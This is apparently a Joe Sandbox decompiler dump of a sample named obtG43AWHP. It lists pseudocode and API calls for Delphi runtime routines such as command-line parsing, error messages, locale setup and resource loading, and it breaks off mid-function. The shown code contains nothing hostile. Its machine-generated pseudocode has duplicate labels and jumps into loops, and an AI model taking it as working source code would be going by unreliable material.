    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}



















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}












    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}










    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}

























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}





























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}





    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}











    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}





    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}


































    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}
































    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
